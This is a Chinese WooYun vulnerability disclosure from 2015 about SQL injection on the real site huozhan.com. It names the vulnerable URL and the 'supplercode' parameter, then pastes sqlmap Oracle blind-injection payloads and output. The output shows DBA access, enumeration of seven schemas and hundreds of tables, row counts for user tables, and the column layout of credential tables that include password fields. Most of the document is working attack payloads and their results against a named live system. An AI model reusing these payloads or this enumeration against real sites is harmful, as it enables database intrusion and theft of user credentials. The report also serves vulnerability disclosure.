当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0153480

漏洞标题:货栈网多处SQL注入(DBA权限+7个库+泄漏用户信息/供应商信息/门店信息等)之二

相关厂商:货栈网

漏洞作者: 路人甲

提交时间:2015-11-11 10:10

修复时间:2015-12-26 10:10

公开时间:2015-12-26 10:10

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-11: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-12-26: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

跟着大牛测试!~~~多个参数存在注入!~~~

详细说明:

注入点一:
http://www.huozhan.com/SupplierMessageAction_showSupplierBasicMessage.do?supplercode=010005
supplercode存在注入

这里是参数后面多加了',测试结果只有时间盲注了
GET parameter 'supplercode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
sqlmap identified the following injection points with a total of 1074 HTTP(s) re
quests:
---
Place: GET
Parameter: supplercode
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: supplercode=010005' AND 2848=DBMS_PIPE.RECEIVE_MESSAGE(CHR(114)||CH
R(119)||CHR(120)||CHR(76),5)-- sMgK
---
[00:08:56] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:08:56] [INFO] fetching current user
[00:08:56] [WARNING] multi-threading is considered unsafe in time-based data ret
rieval. Going to switch it off automatically
[00:08:56] [INFO] retrieved:
[00:08:56] [WARNING] it is very important not to stress the network adapter's ba
ndwidth during usage of time-based payloads
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option
'--time-sec')? [Y/n] Y
[00:09:16] [INFO] adjusting time delay to 2 seconds due to good response times
HUOZHAN
current user:    'HUOZHAN'
[00:10:10] [INFO] fetching current database
[00:10:10] [INFO] resumed: HUOZHAN
[00:10:10] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HUOZHAN'
[00:10:10] [INFO] testing if current user is DBA
current user is DBA:    True
没有加'(撇号)测试结果如下
GET parameter 'supplercode' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] N
sqlmap identified the following injection points with a total of 295 HTTP(s) req
uests:
---
Place: GET
Parameter: supplercode
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: supplercode=010005' AND 5423=5423 AND 'ZXAX'='ZXAX
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: supplercode=010005' AND 2074=DBMS_PIPE.RECEIVE_MESSAGE(CHR(73)||CHR
(82)||CHR(80)||CHR(122),5) AND 'HacK'='HacK
---
[00:16:30] [INFO] the back-end DBMS is Oracle
web application technology: Nginx, JSP
back-end DBMS: Oracle
[00:16:30] [INFO] fetching current user
[00:16:30] [INFO] retrieving the length of query output
[00:16:30] [INFO] retrieved: 7
[00:16:35] [INFO] retrieved: HUOZHAN
current user:    'HUOZHAN'
[00:16:35] [INFO] fetching current database
[00:16:35] [INFO] retrieving the length of query output
[00:16:35] [INFO] resumed: 7
[00:16:35] [INFO] resumed: HUOZHAN
[00:16:35] [WARNING] on Oracle you'll need to use schema names for enumeration a
s the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle):    'HUOZHAN'
[00:16:35] [INFO] testing if current user is DBA
current user is DBA:    True
available databases [7]:
[*] HRZMART
[*] HUOZHAN
[*] OUTLN
[*] SHOP
[*] SYS
[*] SYSTEM
[*] WMSYS
Database: HUOZHAN
[469 tables]
+--------------------------------+
| A                              |
| AAAA12                         |
| ABA                            |
| ABC                            |
| ABCD                           |
| ADDRESS_INFO                   |
| ADMIN_USER                     |
| AREA_BAR_CODE                  |
| AREA_BRAND                     |
| AREA_CATEGORY                  |
| AREA_INFO                      |
| AREA_ITEM                      |
| AREA_ITEM_CATEGORY             |
| AREA_VIP                       |
| AREA_VIP_CATEGORY              |
| AREA_VIP_ITEM                  |
| AREA_VIP_STORE                 |
| ARTICLE                        |
| ARTICLE_CATEGORY               |
| ATW0614                        |
| ATW0614_2                      |
| ATW09                          |
| AUTH                           |
| AUTHUSER_0801                  |
| AUTH_BAK                       |
| AUTH_CHILD_ROLE                |
| AUTH_CHILD_ROLE_ACCESS         |
| AUTH_ROLE                      |
| AUTH_ROLE_ACCESS               |
| AUTH_ROLE_ACCESSBAK            |
| AUTH_ROLE_ACCESS_1             |
| AUTH_USER                      |
| AUTH_USER_BAK                  |
| AUTH_USER_CHILD_ROLE           |
| AUTH_USER_MSG                  |
| AUTH_USER_ROLE                 |
| AUUSER0709                     |
| BALANCE_TABLE                  |
| BANK_BILL_RECORD               |
| BANK_CODE                      |
| BANK_PAY_ACCOUNT               |
| BANK_PAY_LOG                   |
| BF_0831_DRX                    |
| BILL_DETAIL                    |
| BILL_ITEM                      |
| BILL_ORDER                     |
| BILL_SUPPLIER_RATE             |
| BILL_SUPPLIER_RATE_TEMP        |
| BILL_SYS_RATE                  |
| BRAND                          |
| BUSINESS_COMMENTS              |
| BUSS_COMPANY                   |
| BUSS_EXTR_TOTAL                |
| BUSS_MONEY                     |
| CARD_ACCOUNT_REPORT            |
| CATEGORY_BRAND                 |
| CHILD_USER_INFO                |
| CITY                           |
| CK1320                         |
| CKCX                           |
| CKCX2                          |
| CLIENT_MEMBER_SHOP             |
| CLIENT_ORDERS_TEMP             |
| CONTRACT                       |
| CREDENTIAL_INFO                |
| CZ_0914FE                      |
| DAY_CATEGORY_BILL_SUMMARY      |
| DAY_ITEM_BILL_SUMMARY          |
| DAY_ITEM_BILL_SUMMARY_TEMP     |
| DAY_LOGISTICS_ACHIEVEMENT      |
| DAY_LOGISTICS_ACHIEVEMENT_TEMP |
| DAY_SETTLEMNET_LOG             |
| DAY_STORE_BILL_SUMMARY         |
| DAY_STORE_MONEY                |
| DAY_SUPPLIER_BILL_SUMMARY      |
| DAY_SUPPLIER_MEMBER_SUMMARY    |
| DESK_ANNOUNCE                  |
| DIRECT_SUPPLY_SHOW             |
| DLA_OLD                        |
| ET_OTP_PROD                    |
| ET_OTP_RECORD                  |
| ET_OTP_USER                    |
| FANKUAN_TW                     |
| FC1320                         |
| FCCX                           |
| FCCX2                          |
| FINANCE_PARAM_SET              |
| GAOZHAN_TEST                   |
| GATHER_LOG                     |
| GG_0607                        |
| GIFT_ITEM_DAY_SETTLEMNET       |
| GIFT_ITEM_IN                   |
| GIFT_ITEM_IN_DETAIL            |
| GIFT_ITEM_OUT                  |
| GIFT_ITEM_OUT_DETAIL           |
| GIFT_ITEM_RETURN               |
| GIFT_ITEM_RETURN_DETAIL        |
| GIFT_ITEM_STORE_DETAIL         |
| HRZPAY_ARTICLE                 |
| HRZPAY_ARTICLE_CATEGORY        |
| HRZ_P0811                      |
| HRZ_PAY_USER                   |
| HRZ_WORK                       |
| HRZ_WORK_USER                  |
| HUOZHAN_ADVERTISE              |
| HZ_MESSAGE                     |
| HZ_NEWS                        |
| HZ_NEWS_SORT                   |
| INVENTORY                      |
| INVENTORY_CHANGE_DETAIL        |
| INVENTORY_CHANGE_TOTAL         |
| INVENTORY_DETAIL               |
| INVENTORY_JOURNAL              |
| ITEM_CATEGORY                  |
| ITEM_DAY_DETAILS               |
| ITEM_DAY_SETTLEMNET            |
| ITEM_DAY_SETTLEMNET_TEMP       |
| ITEM_PLU_CODE                  |
| ITEM_ROOM                      |
| ITEM_TEMP                      |
| ITW0906                        |
| JXYF_PHONE_PROD                |
| JXYF_PHONE_RECORD              |
| JXYF_QQ_PROD                   |
| JXYF_QQ_RECORD                 |
| KC2012120211                   |
| KCSUP_ITEM                     |
| KC_ITEM0718                    |
| LOGISTICS_FEE_TYPE             |
| LOGISTICS_FINANCE_TOTAL        |
| LOGISTICS_INFO                 |
| LOGISTICS_LINE                 |
| LOGISTICS_MONEY                |
| LOGISTICS_ORDER_OPER           |
| LOGISTICS_PINGJIA_MAN          |
| LOGISTICS_PINGJIA_TOTAL        |
| LOGISTICS_RECEIVE              |
| LOGISTICS_RECEIVE_DETAIL       |
| LOGISTICS_REQUEST              |
| LOGISTICS_REQUEST_DETAILS      |
| LOGISTICS_SENDOUT_DETAIL       |
| LOGISTICS_SENDOUT_TOTAL        |
| LOGISTICS_SERVICE_MAN          |
| LOGISTICS_TASK_FEE             |
| LOGISTICS_TASK_ORDER           |
| LOGISTICS_TASK_TOTAL           |
| LOGISTICS_TASK_USER            |
| LOGISTICS_USER                 |
| LOGISTICS_USER_CATEGORY        |
| LOGISTICS_USER_OPER            |
| LOGISTICS_USER_WORKREPORT      |
| LOGISTICS_VEHICLE              |
| LOVE_ITEM                      |
| MARKET_BILL_RECORD             |
| MARKET_BILL_RECORD_DETAIL      |
| MARKET_ENTRY                   |
| MARKET_ENTRY_CANCEL            |
| MARKET_ENTRY_CONTRACT          |
| MARKET_PAY                     |
| MARKET_USER_ACCOUNT            |
| MARKET_USER_ACCOUNT_RIGHT      |
| MEMBER_FEE                     |
| MEMBER_FEE_BAK                 |
| MEM_CARDSUM_TYPE               |
| MEM_CARD_INFO                  |
| MEM_CARD_INFO_BACK             |
| MEM_CARD_INFO_OLD              |
| MEM_CARD_INFO_TEMP             |
| MEM_CARD_SCORING_RECORD        |
| MEM_CARD_SCORING_STORE         |
| MEM_CARD_SCORING_TRADE         |
| MEM_CARD_TOTAL                 |
| MEM_CARD_TYPE                  |
| MEM_CONSUME_RECORD             |
| MEM_MEMBER_INFO                |
| MEM_PAY_MONEY                  |
| MM1_0823                       |
| MM_0823                        |
| NAMEQI0714                     |
| NEW_FLAG_ITEM                  |
| OPERATOR_STORE                 |
| ORDERDETAIL0709                |
| ORDERTOTAL0709                 |
| ORDER_CODE_1320                |
| PARAMETER_SET                  |
| PDA_INFO                       |
| PDA_JOURNAL                    |
| PDA_USER                       |
| PLAN_TABLE                     |
| PLU_CATEGORY                   |
| POVINCE                        |
| PROMOTION_DETAIL               |
| PROMOTION_PRESENT_DETAIL       |
| PROMOTION_PRESENT_TOTAL        |
| PROMOTION_TOTAL                |
| PUB_ITEM                       |
| PUB_ITEM_CATEGORY              |
| PUB_ITEM_OLDCATEGORY           |
| PURCHASER                      |
| QUEST_SOO_AT_APPNAME           |
| QUEST_SOO_AT_EXECUTION_PLAN    |
| QUEST_SOO_AT_OPERATIONS        |
| QUEST_SOO_AT_PARSE_CURSOR      |
| QUEST_SOO_AT_PARSE_ERROR       |
| QUEST_SOO_AT_PARSE_WAITS       |
| QUEST_SOO_AT_SESSION_ID        |
| QUEST_SOO_AT_SQL_BINDS         |
| QUEST_SOO_AT_SQL_EXECUTIONS    |
| QUEST_SOO_AT_SQL_EXEC_ERROR    |
| QUEST_SOO_AT_SQL_FETCH         |
| QUEST_SOO_AT_SQL_STATEMENT     |
| QUEST_SOO_AT_SQL_STMT_PIECES   |
| QUEST_SOO_AT_SQL_WAITS         |
| QUEST_SOO_AT_TRACE_FILE        |
| QUEST_SOO_AT_WAIT_NAMES        |
| QUEST_SOO_BUFFER_BUSY          |
| QUEST_SOO_EVENT_CATEGORIES     |
| QUEST_SOO_LOCK_TREE            |
| QUEST_SOO_PARSE_TIME_TRACK     |
| QUEST_SOO_PLAN_TABLE           |
| QUEST_SOO_SB_BUFFER_BUSY       |
| QUEST_SOO_SB_EVENT             |
| QUEST_SOO_SB_IO_STAT           |
| QUEST_SOO_SCHEMA_VERSIONS      |
| QUEST_SOO_VERSION              |
| REPORT_ARRIVAL_RATE            |
| REPORT_BRAND_TRANSACTION       |
| REPORT_CATEGORY_DAILY          |
| REPORT_CATEGORY_TRANSACTION    |
| REPORT_ITEM_CONSIGNMENT        |
| REPORT_ITEM_DAILY              |
| REPORT_STORE_ORDER_ALLOCATION  |
| REPORT_STORE_RECEIVE           |
| REPORT_STORE_TRANSACTION       |
| REPORT_SUPPLIER_OUT_STOCK      |
| RETAIL_PRODUCT                 |
| RK1320                         |
| RKCX                           |
| RKCX2                          |
| RR1SS                          |
| RR2SS                          |
| S1102_S                        |
| SCORE_INFO                     |
| SCORE_SET                      |
| SECOND_KILL_ITEM               |
| SECOND_KILL_USER               |
| SERVICE_MAN                    |
| SERVICE_MAN_FINANCE_TOTAL      |
| SERVICE_MAN_ITEM_CATEGORY      |
| SERVICE_MAN_RATE               |
| SFD_0810                       |
| SHOPITEM0709                   |
| SHOP_DAY_R_XS                  |
| SM0915_T                       |
| SOT20130118                    |
| SSD20130204                    |
| SSDTW0613                      |
| SSD_0830                       |
| SSS0530                        |
| ST020130205                    |
| ST0425TW_ART                   |
| STI_NULL_W0520                 |
| STOCK_AREA                     |
| STOCK_AREA_ITEM_CATEGORY       |
| STOCK_BAD_DETAIL               |
| STOCK_CHG_1008T                |
| STOCK_CHG_2132T                |
| STOCK_GIFT_ITEM                |
| STOCK_HISTORY_DAY              |
| STOCK_HONGCHONG_DETAIL         |
| STOCK_HONGCHONG_TOTAL          |
| STOCK_ITEM_ADJUST              |
| STOCK_LACK                     |
| STOCK_LOGS                     |
| STOCK_LOGS1101_                |
| STOCK_LOGS1101_MIN_ID          |
| STOCK_LOGS1101_NUM             |
| STOCK_LOGS1101_NUM_ALL         |
| STOCK_NORMAL_DETAIL            |
| STOCK_ROOM                     |
| STOCK_ROOM_EXCHANGE            |
| STOCK_ROOM_EXCHANGE_DETAIL     |
| STOCK_ROOM_ITEM                |
| STOCK_TOTAL                    |
| STOCK_TOTALCZ0718              |
| STOCK_TOTAL_BATCH              |
| STOCK_TOTAL_BATCH0901          |
| STOCK_TOTAL_BATCH_22           |
| STOCK_TOTAL_BATCH_823          |
| STOCK_TOTAL_BATCH_829          |
| STOCK_TOTAL_BATCH_CHG          |
| STOCK_TOTAL_BATCH_CHG0901      |
| STOCK_TOTAL_BATCH_CHG_823      |
| STOCK_TOTAL_BATCH_CHG_829      |
| STOCK_TOTAL_CHGAVG_LOG         |
| STOCK_TOTAL_DAHU               |
| STOCK_TOTAL_DAY                |
| STOCK_TOTAL_LOG                |
| STOCK_UNEQUAL_RECORD           |
| STORE                          |
| STORE1_AC_REPORJ0823           |
| STORE_ACCOUNT_DAY_REPORT       |
| STORE_ACCOUNT_REPORT           |
| STORE_AC_REPORJ0823            |
| STORE_CARDSALE_DETAIL          |
| STORE_FAVOR                    |
| STORE_HOMOLOGOUS               |
| STORE_HUOZHAN                  |
| STORE_ITEM_STOCK               |
| STORE_KEEP_MONEY               |
| STORE_MONEY                    |
| STORE_MONEY_CZ2                |
| STORE_MONEY_EXTR               |
| STORE_MONEY_TEMP               |
| STORE_MON_0816                 |
| STORE_ORDER_DETAIL             |
| STORE_ORDER_DIFF_DETAIL        |
| STORE_ORDER_DIFF_TOTAL         |
| STORE_ORDER_DIRECT             |
| STORE_ORDER_OVERING            |
| STORE_ORDER_SECONDKILL_DETAIL  |
| STORE_ORDER_STATUS             |
| STORE_ORDER_TEMP               |
| STORE_ORDER_TEMP_NULL          |
| STORE_ORDER_TOTAL              |
| STORE_ORDER_TOTAL_0317CZ2      |
| STORE_ORDER_TOTAL_ERRORBALANCE |
| STORE_PREPAID_MONEY            |
| STORE_PUB_ITEM                 |
| STORE_RECHARGEABLE             |
| STORE_RETURN_DETAIL            |
| STORE_RETURN_MONEY             |
| STORE_RETURN_TOTAL             |
| STORE_SELF_ITEM                |
| STORE_SENDOUT_DETAIL           |
| STORE_SEN_ITEM0614             |
| STORE_SEN_ITEM0614CD           |
| STORE_SORT                     |
| STORE_STORETYPE                |
| STORE_TRANSACTION_PRICE        |
| STORE_TYPE                     |
| STORE_TYPE_ITEM                |
| STORE_TYPE_ITEM_GIFT_DETAIL    |
| STORE_TYPE_ITEM_GIFT_TOTAL     |
| STORE_TYPE_ITEM_HIS            |
| STORE_TYPE_ITEM_NEW            |
| STORE_TYPE_ITEM_UPSHELF        |
| STORE_TYPE_ITE_20120502        |
| STORE_USER                     |
| SUB_AREA_INFO                  |
| SUB_AREA_ITEM                  |
| SUGGED_ITEM                    |
| SUM_0519W                      |
| SUPPLIER                       |
| SUPPLIER_ACCOUNT_DAY_RPT       |
| SUPPLIER_ACCOUNT_REPORT        |
| SUPPLIER_ADVERTISEMENT         |
| SUPPLIER_AREA_FEE              |
| SUPPLIER_BRAND                 |
| SUPPLIER_BRAND_TEMP            |
| SUPPLIER_CATEGORY              |
| SUPPLIER_CATEGORY_ALIAS        |
| SUPPLIER_CATEGORY_TEMP         |
| SUPPLIER_CHANGE_PRICE          |
| SUPPLIER_CHANGE_TOTAL          |
| SUPPLIER_CUSTOMERS             |
| SUPPLIER_DELIVERY              |
| SUPPLIER_DIRECT_OUT_DETAIL     |
| SUPPLIER_DIRECT_OUT_SUM_DETAIL |
| SUPPLIER_DIRECT_OUT_TOTAL      |
| SUPPLIER_FEE                   |
| SUPPLIER_FEE_DETAIL            |
| SUPPLIER_FEE_TOTAL             |
| SUPPLIER_FINANCE_DAY           |
| SUPPLIER_FINANCE_DETAIL        |
| SUPPLIER_FINANCE_DETAIL_0927   |
| SUPPLIER_FINANCE_DETAIL_CZ2    |
| SUPPLIER_FINANCE_TOTAL         |
| SUPPLIER_FINANCE_TOTAL_CZ2     |
| SUPPLIER_GETFEE_DETAIL         |
| SUPPLIER_GETFEE_TOTAL          |
| SUPPLIER_GETFEE_TYPE           |
| SUPPLIER_HUOZHAN               |
| SUPPLIER_ITEM                  |
| SUPPLIER_ITEM_FEE_DETAIL       |
| SUPPLIER_ITEM_FEE_TOTAL        |
| SUPPLIER_ITEM_IMG              |
| SUPPLIER_ITEM_PURCHASER        |
| SUPPLIER_KEEP_MONEY            |
| SUPPLIER_MEMBERS               |
| SUPPLIER_MEMBERS_EXTR          |
| SUPPLIER_MONEY                 |
| SUPPLIER_MONEY1026T            |
| SUPPLIER_MONEY1028             |
| SUPPLIER_MONEY_0205            |
| SUPPLIER_MONEY_0728            |
| SUPPLIER_MONEY_092311          |
| SUPPLIER_MONEY_092311A         |
| SUPPLIER_MONEY_1209            |
| SUPPLIER_MONEY_3111247         |
| SUPPLIER_MONEY_3170221         |
| SUPPLIER_MONEY_3171052         |
| SUPPLIER_MONEY_910TW           |
| SUPPLIER_MONEY_913TW           |
| SUPPLIER_MONEY_913TW2          |
| SUPPLIER_MONEY_99TW            |
| SUPPLIER_MONEY_BAK_60101       |
| SUPPLIER_MONEY_CZ2             |
| SUPPLIER_MONEY_NTW910          |
| SUPPLIER_MONEY_NTW99           |
| SUPPLIER_MONY010075            |
| SUPPLIER_NEW_FINDETAIL         |
| SUPPLIER_RECD_ITEM             |
| SUPPLIER_RETURN_DETAIL         |
| SUPPLIER_RETURN_TOTAL          |
| SUPPLIER_STAR                  |
| SUPPLIER_STOCK_MONEY           |
| SUPPLIER_STOCK_RECORD          |
| SUPPLIER_STORETYPE_ITEM        |
| SUPPLIER_STORETYPE_ITEM_LOG    |
| SUPPLIER_STORE_ACCPER          |
| SUPPLIER_STORE_DELIVERY        |
| SUPPLIER_STORE_PRICE           |
| SUPPLIER_STORE_PROXYITEM       |
| SUPPLIER_STORE_RECORD          |
| SUPPLIER_STORE_TYPE            |
| SUPPLIER_SUB_AREA              |
| SUPPLIER_USER                  |
| SUPP_ITEM_0822                 |
| SWAY_0711                      |
| SYSTEM_ARGS                    |
| SYSTEM_INFO                    |
| SYSTEM_JOBS                    |
| S_MONEY0804                    |
| TH1320                         |
| THCX                           |
| THCX2                          |
| THIRD_LOGISTICS_ITEM           |
| THIRD_LOGISTICS_ORDER          |
| THIRD_LOGISTICS_ORDER_DETAIL   |
| THIRD_LOGISTICS_ORDER_TOTAL    |
| TIMER_TEST                     |
| TMP_DAY_STORE_MONEY            |
| TOP_ITEM                       |
| TW0709                         |
| TW07092                        |
| TW0713                         |
| TW_120821                      |
| TW_120821AU                    |
| UNIT_TRANS                     |
| URLFILTER                      |
| USER_ACCESS_RECORD             |
| USER_BANK_ACCOUNT              |
| USER_DOMAIN                    |
| USER_OPER_LOG                  |
| USER_RECHARGE_ACCOUNT          |
| USER_RECHARGE_TYPE             |
| USER_SUGGEST                   |
| WEB_CHANGE_PRICE               |
| WEB_CHANGE_PRICE_DETAIL        |
| WEB_CHANGE_PRICE_TOTAL         |
| WORKER_ORDER                   |
| WORKER_WAREHOUSE               |
| XGSJ20130206                   |
| XIFEI_TW                       |
| YEE_BILL_RECORD                |
| YEE_BILL_RECORD_DETAIL         |
| YL_0519W                       |
| ZS_0831S                       |
+--------------------------------+
Database: SHOP
[172 tables]
+--------------------------------+
| AIC_0812                       |
| DAY_AVGSTKSALE                 |
| DAY_REPORT                     |
| DAY_REPORT2                    |
| DAY_REPORTHIST                 |
| DAY_REPORT_JXC                 |
| DAY_REPORT_JXC_2010            |
| DAY_REPORT_JXC_201106          |
| DAY_REPORT_JXC_201107          |
| DAY_REPORT_JXC_201108          |
| DAY_REPORT_JXC_201109          |
| DAY_REPORT_JXC_201110          |
| DAY_REPORT_JXC_201111          |
| DAY_REPORT_JXC_201112          |
| DAY_REPORT_JXC_201201          |
| DAY_REPORT_JXC_201202          |
| DAY_REPORT_JXC_201203          |
| DAY_REPORT_JXC_201204          |
| DAY_REPORT_JXC_201205          |
| DAY_REPORT_JXC_201206          |
| DAY_REPORT_JXC_201207          |
| DAY_REPORT_JXC_201208          |
| DAY_REPORT_JXC_201209          |
| DAY_REPORT_JXC_201210          |
| DAY_REPORT_JXC_201211          |
| DAY_REPORT_JXC_201212          |
| DAY_REPORT_JXC_201301          |
| DAY_REPORT_JXC_201302          |
| DAY_REPORT_JXC_201303          |
| DAY_REPORT_JXC_201304          |
| DAY_REPORT_JXC_201305          |
| DAY_REPORT_JXC_201306          |
| DAY_REPORT_JXC_201307          |
| DAY_REPORT_JXC_201308          |
| DAY_REPORT_JXC_201309          |
| DAY_REPORT_JXC_201310          |
| DAY_REPORT_JXC_201311          |
| DAY_REPORT_JXC_201312          |
| DAY_REPORT_JXC_201401          |
| DAY_REPORT_JXC_201402          |
| DAY_REPORT_JXC_201403          |
| DAY_REPORT_JXC_201404          |
| DAY_REPORT_JXC_201405          |
| DAY_REPORT_JXC_201406          |
| DAY_REPORT_JXC_201407          |
| DAY_REPORT_JXC_201408          |
| DAY_REPORT_JXC_201409          |
| DAY_REPORT_JXC_201410          |
| DAY_REPORT_JXC_201411          |
| DAY_REPORT_JXC_201412          |
| DAY_REPORT_JXC_201501          |
| DAY_REPORT_JXC_201502          |
| DAY_REPORT_JXC_201503          |
| DAY_REPORT_JXC_201504          |
| DAY_REPORT_JXC_201505          |
| DAY_REPORT_JXC_201506          |
| DAY_REPORT_JXC_201507          |
| DAY_REPORT_JXC_201508          |
| DAY_REPORT_JXC_201509          |
| DAY_REPORT_JXC_201510          |
| DAY_REPORT_JXC_TEMP            |
| DAY_REPORT_TEMP                |
| DAY_REPORT_XS                  |
| DAY_REPORT_XS_201106           |
| DAY_REPORT_XS_20110601         |
| DAY_REPORT_XS_201107           |
| DAY_REPORT_XS_201108           |
| DAY_REPORT_XS_201109           |
| DAY_REPORT_XS_201110           |
| DAY_REPORT_XS_201111           |
| DAY_REPORT_XS_201112           |
| DAY_REPORT_XS_201201           |
| DAY_REPORT_XS_201202           |
| DAY_REPORT_XS_201203           |
| DAY_REPORT_XS_201204           |
| DAY_REPORT_XS_201205           |
| DAY_REPORT_XS_201206           |
| DAY_REPORT_XS_201207           |
| DAY_REPORT_XS_201208           |
| DAY_REPORT_XS_201209           |
| DAY_REPORT_XS_201210           |
| DAY_REPORT_XS_201211           |
| DAY_REPORT_XS_201212           |
| DAY_REPORT_XS_201301           |
| DAY_REPORT_XS_201302           |
| DAY_REPORT_XS_201303           |
| DAY_REPORT_XS_201304           |
| DAY_REPORT_XS_201305           |
| DAY_REPORT_XS_201306           |
| DAY_REPORT_XS_201307           |
| DAY_REPORT_XS_201308           |
| DAY_REPORT_XS_201309           |
| DAY_REPORT_XS_201310           |
| DAY_REPORT_XS_201311           |
| DAY_REPORT_XS_201312           |
| DAY_REPORT_XS_201401           |
| DAY_REPORT_XS_201402           |
| DAY_REPORT_XS_201403           |
| DAY_REPORT_XS_201404           |
| DAY_REPORT_XS_201405           |
| DAY_REPORT_XS_201406           |
| DAY_REPORT_XS_201407           |
| DAY_REPORT_XS_201408           |
| DAY_REPORT_XS_201409           |
| DAY_REPORT_XS_201410           |
| DAY_REPORT_XS_201411           |
| DAY_REPORT_XS_201412           |
| DAY_REPORT_XS_201501           |
| DAY_REPORT_XS_201502           |
| DAY_REPORT_XS_201503           |
| DAY_REPORT_XS_201504           |
| DAY_REPORT_XS_201505           |
| DAY_REPORT_XS_201506           |
| DAY_REPORT_XS_201507           |
| DAY_REPORT_XS_201508           |
| DAY_REPORT_XS_201509           |
| DAY_REPORT_XS_201510           |
| DAY_REPORT_XS_TEMP             |
| DAY_STORE_JOB_CONTROL          |
| GATHER_LOG                     |
| ITEM_POOLING_CHG               |
| MON_REPORT                     |
| MON_REPORTHIST                 |
| POS_CASHIER_RIGHTS             |
| POS_RIGHTS                     |
| RECEIVER                       |
| RETAIL_PRODUCT                 |
| SALES_INVOICES_CASH            |
| SALES_INVOICES_CASHHIST        |
| SALES_INVOICES_DETAIL          |
| SALES_INVOICES_DETAIL1         |
| SALES_INVOICES_DETAIL2         |
| SALES_INVOICES_DETAILHIST      |
| SALES_INVOICES_DETAILLY        |
| SALES_INVOICES_DETAIL_2010     |
| SALES_INVOICES_DETAIL_201106   |
| SALES_INVOICES_DETAIL_20110620 |
| SALES_INVOICES_TOTAL           |
| SALES_INVOICES_TOTALHIST       |
| SEQUENCE                       |
| SINVE_0906                     |
| STOCK_CHG                      |
| STOCK_CHGHIST                  |
| STOCK_CHG_2010                 |
| STOCK_DETAIL                   |
| STOCK_DETAIL_HIST              |
| STOCK_DIFFERENCE               |
| STOCK_INVOICES                 |
| STOCK_INVOICESHIST             |
| STOCK_INVOICES_20110601        |
| STOCK_INVOICES_TOTAL           |
| STOCK_INVOICES_TOTALHIST       |
| STOCK_PROD_DATE                |
| STOCK_ROOM                     |
| STOCK_ROOM_ITEM                |
| STORE_INVE                     |
| STORE_ITEM_BARCODES            |
| STORE_ITEM_PROMOTION           |
| STORE_POS_INFO                 |
| STORE_POS_INVE                 |
| STORE_POS_MANA                 |
| STORE_PRICE_ADJUST_HISTORY     |
| STORE_SALE_INPUT               |
| STORE_SENDOUT_ITEM             |
| STORE_SENDOUT_ITEM_NEWCATEGORY |
| TMP_DAY_REPORT                 |
| TMP_DAY_REPORT1                |
| TMP_SALES_INVOICES_DETAIL      |
| TMP_STOCK_CHG                  |
| T_JXC_MIDDLE                   |
| T_XS_MIDDLE                    |
| USER_ACCESS_RECORD             |
+--------------------------------+
Database: HRZMART
[26 tables]
+--------------------------------+
| ARTICLE                        |
| ARTICLE_CATEGORY               |
| ATTR_VALUE                     |
| BRAND_CATEGORY                 |
| CITY                           |
| COUNTRY                        |
| HSTORE                         |
| HSTORE_MONEY                   |
| ITEM_ATTR                      |
| ITEM_ATTR_ACCESS               |
| ITEM_BRAND                     |
| ITEM_CATEGORY_ATTR             |
| ITEM_EXPRESS                   |
| ITEM_TOP_TYPE                  |
| MALLUSER                       |
| MALL_ITEM                      |
| MALL_ITEM_CATEGORY             |
| MALL_ITEM_TOP                  |
| NORMALUSER                     |
| PROVINCE                       |
| TO_USER_INFO                   |
| USER_FAVOR                     |
| USER_OPER_LOG                  |
| USER_ORDER_DETAIL              |
| USER_ORDER_TOTAL               |
| VIEW_ITEM                      |
+--------------------------------+
Database: HUOZHAN
+---------------------+---------+
| Table               | Entries |
+---------------------+---------+
| AUTH_USER           | 31640   |
| STORE_USER          | 26138   |
| AUTH_USER_BAK       | 4543    |
| HRZ_PAY_USER        | 1180    |
| SUPPLIER_USER       | 1065    |
| LOGISTICS_USER      | 488     |
| CHILD_USER_INFO     | 250     |
| USER_DOMAIN         | 241     |
| HRZ_WORK_USER       | 228     |
| ET_OTP_USER         | 150     |
| USER_BANK_ACCOUNT   | 66      |
| PDA_USER            | 41      |
| ADMIN_USER          | 15      |
| LOGISTICS_TASK_USER | 6       |
| SECOND_KILL_USER    | 6       |
+---------------------+---------+
Database: HUOZHAN
Table: AUTH_USER_BAK
[14 columns]
+-------------------+-----------+
| Column            | Type      |
+-------------------+-----------+
| ACCOUNT_OVER_TIME | DATE      |
| ID                | NUMBER    |
| IS_HELP           | CHAR      |
| LAST_LOGON_IP     | NVARCHAR2 |
| LAST_LOGON_TIME   | DATE      |
| LOCK_TIME         | DATE      |
| LOGON_NAME        | NVARCHAR2 |
| PARENT_CODE       | VARCHAR2  |
| PASSWORD          | NVARCHAR2 |
| STATUS            | NUMBER    |
| SYSTEM_CODE       | NVARCHAR2 |
| UNLOCK_TIME       | DATE      |
| USER_NAME         | NVARCHAR2 |
| USER_TYPE         | NUMBER    |
+-------------------+-----------+
Database: HUOZHAN
Table: ADMIN_USER
[3 columns]
+------------+-----------+
| Column     | Type      |
+------------+-----------+
| ADMIN_INFO | NVARCHAR2 |
| USER_ID    | NUMBER    |
| USER_NAME  | NVARCHAR2 |
+------------+-----------+
Database: HUOZHAN
Table: LOGISTICS_TASK_USER
[4 columns]
+-----------+--------+
| Column    | Type   |
+-----------+--------+
| ID        | NUMBER |
| TASK_ID   | NUMBER |
| USER_ID   | NUMBER |
| USER_TYPE | NUMBER |
+-----------+--------+
Database: HUOZHAN
Table: ET_OTP_USER
[3 columns]
+--------------+--------+
| Column       | Type   |
+--------------+--------+
| AUTH_USER_ID | NUMBER |
| ET_OTP_PID   | NUMBER |
| ID           | NUMBER |
+--------------+--------+
Database: HUOZHAN
